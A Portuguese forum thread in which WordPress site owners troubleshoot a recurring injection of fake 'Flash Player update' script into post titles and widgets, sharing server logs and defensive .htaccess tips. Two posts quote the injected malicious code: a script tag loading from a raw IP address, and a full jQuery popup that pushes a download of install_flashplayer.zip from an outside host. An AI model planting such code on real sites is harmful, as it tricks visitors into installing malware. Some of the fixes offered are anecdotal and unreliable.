Código insere script no título das notícias, para download do Flash Player

Caros,

O meu site está com mesmo problema. Analisando o log do servidor, achei as seguintes entradas:

143.107.112.2 [15/May/2013:01:22:59 GET / HTTP/1.1

143.107.112.2 [15/May/2013:01:23:43 POST ///wp-login.php HTTP/1.1

143.107.112.2 [15/May/2013:01:23:45 GET //wp-admin/theme-editor.php HTTP/1.1

143.107.112.2 [15/May/2013:01:23:53 GET //wp-admin/widgets.php HTTP/1.1

143.107.112.2 [15/May/2013:01:24:09 GET //wp-admin/edit.php HTTP/1.1

143.107.112.2 [15/May/2013:01:24:30 GET / HTTP/1.1

143.107.112.2 [15/May/2013:01:24:50 GET //wp-admin/edit.php?s=CONSELHO%20NACIONAL%20DE%20JUSTI%C3%87A%20DETERMINA%20QUE%20CART%C3%93RIOS%20REALIZEM%20CASAMENTOS%20HOMOAFETIVOS HTTP/1.1

143.107.112.2 [15/May/2013:01:25:04 GET //wp-admin/edit.php?s=PROCESSOS%20DECIDIDOS%20PELO%20PRINC%C3%8DPIO%20DA%20INSIGNIFIC%C3%82NCIA%20MOVIMENTAM%20TRIBUNAL%20SUPERIOR HTTP/1.1

143.107.112.2 [15/May/2013:01:25:18 GET /wp-admin/post.php?post=14443&action=edit HTTP/1.1

Isso ocorreu várias vezes ao longo do mês e partiu sempre da mesma máquina fazendo a mesma sequencia de páginas. Trocar a senha não adianta, já fiz isso e mesmo não revelando a ninguém, o problema ocorreu. A máquina que faz o ataque pertence à USP, já entrei em contato com eles. O invasor envia este header de informação:

Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15

Como ele usa o firefox, desconfio que seja um script abrindo o navegador e atacando várias máquinas ao mesmo tempo, ou então, uma pessoa acessando remotamente, vai saber..

Minha sugestão: Bloquear ips de acesso. Trocar a pasta wp-admin.

Pessoal, tenho o mesmo problema há vários meses.
Sempre elimino os scripts e sempre voltam depois de + ou – 10 dias…

Na maioria das vezes é criado um Widget com um código assim: <script src=”http://131.244.39.41/br/flashplayer”></script&gt;

O que muda é só o IP em cada ataque. Eu estava com esse problema em um site, só que ontem começou em outro site.

O que resolveu foi com a instalação do WP-Sentinel, não tive mais problema com o SCRIPT, mas o WP-Sentinel sempre estava bloqueando o site então desinstalei.

Já fiz diversas coisas como: Mudar de tema {Original pago}, apagar plugins suspeitos, reinstalar completamente o WordPress.
Não sei mais o que fazer, estou pensando em mudar a pasta principal, exemplo: http://www.site.com.br/novo

Percebo que aparentemente é uma invasão externa, penso que algum servidor {programado} faz esse injeção do código malicioso.

Pessoal,

Esse tipo de ataque (code injection) geralmente é feito através de vulnerabilidades em plugins e temas. São centenas de milhares de plugins criados e distribuidos por qualquer um e fica praticamente impossível acompanhar todas as formas de proteger o seu site WordPress, certo?

Bom, aqui vai um pequeno trecho de código que bloqueia o acesso direto a arquivos PHP dentro dos plugins e temas. Na prática, isso deveria ser prevenido pelo próprio plugin, usando funções que o WP disponibiliza para deixar o plugin mais seguro, mas, nem todos fazem.

Atenção, o código abaixo pode fazer com que algum plugin tenha alguma função bloqueada, caso ele utilize acesso direto aos arquivos PHP pelo usuário. Ao identificar algo assim, substitua o plugin por outro com a mesma funcionalidade.

O código abaixo deve ser colocado num arquivo .htaccess dentro da pasta wp-content:

## REMOVE ACCESS TO NO-ASSETS FILES
order deny,allow
deny from all
<files ~ ".(xml|css|jpe?g|png|gif|js)$">
allow from all
</files>

Caso tenham interesse, eu ofereço pacotes de limpeza e segurança para WordPress. Basta entrar em contato [at] tecnocracia.net.

Ah! Outra dica:

Alguns malwares se aproveitam de cookies do usuário para distribuir infecção. Então, se o seu site está 100% fechado e protegido e mesmo assim códigos continuam aparecendo nos seus posts ou widgets, uma das razões pode ser a infecção local de um usuário com poderes de acesso ao wp-admin.

Funciona assim: você está logado no seu wordpress e tem poder de author ou de admin. Ao acessar um site que esteja infectado, você mesmo (sem saber, óbvio) atualiza um dos últimos posts e adiciona o script no título ou num widget. Também pode acontecer de o malware estar instalado localmente em sua máquina, após ter baixado e instalado o falso plugin de flash.

Sempre eliminem todas as possibilidades antes de pirar, porque mesmo depois de tudo isso, o problema pode estar no hosting e o ataque estar sendo feito diretamente no mySQL ou através de um outro tipo de invasão ao servidor.

Don’t panic. Eliminando as possibilidades, uma a uma, você finalmente vai descobrir qual o problema e, no caminho, vai aprender um monte sobre segurança no WordPress. 😉

Abraço e boa sorte

Olá pessoal.

Tenho o mesmo problema em alguns sites WP. Fiz alguns ajustes recomendados pelos colegas aqui do fórum mas sem sucesso. Hoje criei o .htaccess dentro da pasta wp-content que o colega Manoel recomendou, vamos ver no que dá.

Um detalhe: Administro um site em conjunto com outra pessoa. Quando tudo começou, a primeira infecção, o acesso da outra pessoa era ADMINISTRADOR, então o site foi infectado no INDEX.PHP e também foram criados WIDGETS. Eliminei na unha todos os scripts e depois de um tempo eles voltavam nos mesmo lugares. Então resolvi mudar o acesso desse meu amigo, passei para EDITOR, pois é isso que ele faz. Agora o site é infectado com o script apenas no titulo do ultimo post… Será coincidência? Ou o problema está com o PC do meu amigo?

E mais, ele administra outros sites WP, e adivinhem… 3×4 ele me pede para remover os scripts pra ele.

Tenho mais outros 3 sites que só eu tenho acesso, e nenhum deles foram infectados…

Bom, na minha opnião está obvio que a infecção se dá pelo computador infectado pelo virús, resta saber como impedir que ele faça a mudança no site… Pois é mai dificil convencer que a outra pessoa está com o PC ferrado…

Abçs

Galera, hoje pela madrugada aconteceu comigo. O código que apareceu foi bem diferente, esse: `<script type=”text/javascript”>
$(document).ready(function() {
uLightBox.init({
override:false,
background: ‘black’,
centerOnResize: true,
fade: true
});
{
uLightBox.alert({
width: ‘585px’,
title: ‘Para Continuar Atualize o Adobe@ Flash Player’,
rightButtons: [‘Instalar’],
opened: function() {
$(‘<span />’).html(“<a style=’border:0;’ onClick=’uLightBox.clear();’ href=’http://juslog.com.br/Plugins/popup/install_flashplayer.zip&#8217; target=’_blank’><img src=’./popup/flash-player.png’></a>”).appendTo(‘#lbContent’);
},
onClick: function(button) {
uLightBox.clear();
location = “http://juslog.com.br/Plugins/popup/install_flashplayer.zip&#8221;;
}
});

}
});
</script>`

Mas além desse código, apareceu uma pasta chamada POPUP no FTP. E quando eu tentava excluí-la, dava erro tanto no FTP, quanto no gerenciador de arquivos da minha hospedagem. Vejam se vocês não estão com essa pasta também, porque nela está o código malicioso.

se for em um arquivo alterem a permissão dele para 400 q irá resolver. N tenho os plugins citados e tb estou tendo o mesmo problema, sempre q apago ele volta nos widgets…